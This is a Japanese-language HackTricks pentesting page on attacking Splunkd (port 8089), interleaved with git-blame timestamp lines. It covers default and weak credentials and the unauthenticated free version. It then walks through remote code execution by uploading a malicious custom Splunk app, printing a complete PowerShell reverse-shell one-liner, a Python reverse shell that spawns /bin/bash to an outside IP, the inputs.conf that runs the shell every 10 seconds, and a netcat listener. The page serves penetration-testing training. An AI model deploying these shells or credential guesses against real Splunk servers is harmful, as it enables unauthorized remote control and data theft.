2024-07-19 11:50:08 +00:00
# 8089 - Pentesting Splunkd
2022-04-28 16:01:33 +00:00
2024-07-19 11:50:08 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 11:50:08 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 11:50:08 +00:00
< summary > Support HackTricks< / summary >
2024-02-09 12:54:39 +00:00
2024-07-19 11:50:08 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
2022-10-03 00:11:21 +00:00
< / details >
2024-07-19 11:50:08 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
## **基本情報**
2022-04-28 16:01:33 +00:00
2024-07-19 11:50:08 +00:00
Splunkは、**データの収集、分析、可視化**において重要な役割を果たす**ログ分析ツール**です。その初期の目的は**SIEM( セキュリティ情報およびイベント管理) **ツールとして機能することではありませんでしたが、**セキュリティ監視**や**ビジネス分析**の分野で人気を博しています。
2020-11-06 00:32:50 +00:00
2024-07-19 11:50:08 +00:00
Splunkのデプロイメントは、**機密データ**を保存するために頻繁に利用され、システムを侵害することに成功した場合、潜在的な攻撃者にとって**貴重な情報源**となる可能性があります。**デフォルトポート:** 8089
2021-10-18 11:21:18 +00:00
```
2020-11-06 00:32:50 +00:00
PORT STATE SERVICE VERSION
8089/tcp open http Splunkd httpd
```
2022-10-03 00:11:21 +00:00
{% hint style="info" %}
2024-05-05 23:08:22 +00:00
**Splunkウェブサーバーはデフォルトでポート8000で実行されます**。
2022-10-03 00:11:21 +00:00
{% endhint %}
2020-11-06 00:32:50 +00:00
2023-07-07 23:42:27 +00:00
## 列挙
2022-10-03 00:11:21 +00:00
2023-07-07 23:42:27 +00:00
### 無料版
2022-10-03 00:11:21 +00:00
2024-07-19 11:50:08 +00:00
Splunk Enterpriseのトライアルは**60日後に無料版に変わります**。この**無料版は認証を必要としません**。システム管理者がSplunkのトライアルをインストールしてテストすることは珍しくなく、**その後忘れ去られることがあります**。これにより、認証のない無料版に自動的に変わり、環境にセキュリティホールが生じます。一部の組織は予算の制約から無料版を選択することがありますが、ユーザー/ロール管理がないことの影響を十分に理解していません。
2022-10-03 00:11:21 +00:00
2023-07-07 23:42:27 +00:00
### デフォルトの資格情報
2022-10-03 00:11:21 +00:00
2024-07-19 11:50:08 +00:00
古いバージョンのSplunkでは、デフォルトの資格情報は**`admin:changeme`**であり、ログインページに便利に表示されています。\
しかし、**最新のSplunkのバージョン**では、**インストールプロセス中に資格情報が設定されます**。デフォルトの資格情報が機能しない場合は、`admin`、`Welcome`、`Welcome1`、`Password123`などの一般的な弱いパスワードを確認する価値があります。
2022-10-03 00:11:21 +00:00
2023-07-07 23:42:27 +00:00
### 情報の取得
2022-10-03 00:11:21 +00:00
2024-07-19 11:50:08 +00:00
Splunkにログインすると、**データをブラウズ**したり、**レポートを実行**したり、**ダッシュボードを作成**したり、Splunkbaseライブラリから**アプリケーションをインストール**したり、カスタムアプリケーションをインストールしたりできます。\
また、コードを実行することもできます: Splunkには、サーバーサイドのDjangoアプリケーション、RESTエンドポイント、スクリプト入力、アラートスクリプトなど、**コードを実行するための複数の方法**があります。Splunkサーバーでリモートコード実行を得る一般的な方法は、スクリプト入力を使用することです。
2022-10-03 00:11:21 +00:00
2024-05-05 23:08:22 +00:00
さらに、SplunkはWindowsまたはLinuxホストにインストールできるため、Bash、PowerShell、またはBatchスクリプトを実行するためのスクリプト入力を作成できます。
2020-11-06 00:32:50 +00:00
2022-05-01 13:25:53 +00:00
### Shodan
2020-11-06 00:32:50 +00:00
2024-07-19 11:50:08 +00:00
* `Splunk build`
2022-04-28 16:01:33 +00:00
2022-10-03 00:11:21 +00:00
## RCE
2022-04-28 16:01:33 +00:00
2023-07-07 23:42:27 +00:00
### カスタムアプリケーションの作成
2022-10-03 00:11:21 +00:00
2024-07-19 11:50:08 +00:00
カスタムアプリケーションは**Python、Batch、Bash、またはPowerShellスクリプト**を実行できます。\
**SplunkにはPythonがインストールされている**ため、**Windows**システムでもPythonコードを実行できます。
2022-04-28 16:01:33 +00:00
2024-07-19 11:50:08 +00:00
[**こちら** ](https://github.com/0xjpuff/reverse\_shell\_splunk )のSplunkパッケージを使用して支援できます。このリポジトリの**`bin`**ディレクトリには、[Python](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/rev.py)と[PowerShell](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/run.ps1)の例があります。これをステップバイステップで進めていきましょう。
2022-10-03 00:11:21 +00:00
2024-07-19 11:50:08 +00:00
これを達成するために、まず次のディレクトリ構造を使用してカスタムSplunkアプリケーションを作成する必要があります:
2022-10-03 00:11:21 +00:00
```shell-session
tree splunk_shell/
splunk_shell/
├── bin
└── default
```
2024-07-19 11:50:08 +00:00
**`bin`** ディレクトリには、私たちが実行することを意図した **スクリプト** (この場合、**PowerShell** リバースシェル)が含まれ、デフォルトのディレクトリには `inputs.conf` ファイルがあります。私たちのリバースシェルは **PowerShell ワンライナー** になります:
2022-10-03 00:11:21 +00:00
```powershell
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>& 1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(
```
2024-07-19 11:50:08 +00:00
[inputs.conf ](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf ) ファイルは、Splunk に **どのスクリプトを実行するか** およびその他の条件を指示します。ここでは、アプリを有効に設定し、Splunk にスクリプトを 10 秒ごとに実行するよう指示します。間隔は常に秒単位であり、この設定が存在する場合にのみ入力(スクリプト)が実行されます。
2022-10-03 00:11:21 +00:00
```shell-session
2023-07-07 23:42:27 +00:00
cat inputs.conf
2022-10-03 00:11:21 +00:00
[script://./bin/rev.py]
2023-07-07 23:42:27 +00:00
disabled = 0
interval = 10
sourcetype = shell
2022-10-03 00:11:21 +00:00
[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10
```
2024-07-19 11:50:08 +00:00
`.bat` ファイルが必要で、これはアプリケーションがデプロイされるときに実行され、PowerShellのワンライナーを実行します。
次のステップは、`Install app from file`を選択し、アプリケーションをアップロードすることです。
2022-10-03 00:11:21 +00:00
2024-05-05 23:08:22 +00:00
< figure > < img src = "../.gitbook/assets/image (668).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-10-03 00:11:21 +00:00
2023-07-07 23:42:27 +00:00
悪意のあるカスタムアプリをアップロードする前に、Netcatまたは[socat](https://linux.die.net/man/1/socat)を使用してリスナーを開始しましょう。
2022-10-03 00:11:21 +00:00
```shell-session
sudo nc -lnvp 443
listening on [any] 443 ...
```
2024-07-19 11:50:08 +00:00
`Upload app` ページで、ブラウズをクリックし、以前に作成したtarballを選択して`Upload`をクリックします。**アプリケーションをアップロードするとすぐに**、アプリケーションのステータスが自動的に`Enabled`に切り替わるため、**リバースシェルが受信されます**。
2022-10-03 00:11:21 +00:00
#### Linux
2024-07-19 11:50:08 +00:00
**Linuxホスト**を扱っている場合、カスタム悪意のあるアプリをtarballとして作成してアップロードする前に、**`rev.py` Pythonスクリプトを編集する必要があります**。残りのプロセスは同じで、Netcatリスナーでリバースシェル接続を取得し、すぐに進むことができます。
2022-10-03 00:11:21 +00:00
```python
import sys,socket,os,pty
ip="10.10.14.15"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')
```
2024-07-19 11:50:08 +00:00
### RCE & Privilege Escalation
2022-10-03 00:11:21 +00:00
2024-07-19 11:50:08 +00:00
以下のページでは、このサービスが特権を昇格させ、持続性を得るためにどのように悪用されるかの説明を見つけることができます:
2022-10-03 00:11:21 +00:00
{% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %}
[splunk-lpe-and-persistence.md ](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md )
{% endcontent-ref %}
2024-07-19 11:50:08 +00:00
## References
2022-10-03 00:11:21 +00:00
* [https://academy.hackthebox.com/module/113/section/1213 ](https://academy.hackthebox.com/module/113/section/1213 )
2024-07-19 11:50:08 +00:00
{% hint style="success" %}
AWSハッキングを学び、練習する: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCPハッキングを学び、練習する: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-10-03 00:11:21 +00:00
2024-07-19 11:50:08 +00:00
< details >
2024-02-09 12:54:39 +00:00
2024-07-19 11:50:08 +00:00
< summary > HackTricksをサポートする< / summary >
2022-04-28 16:01:33 +00:00
2024-07-19 11:50:08 +00:00
* [**サブスクリプションプラン** ](https://github.com/sponsors/carlospolop )を確認してください!
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**をフォローしてください。**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してハッキングトリックを共有してください。**
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 11:50:08 +00:00
{% endhint %}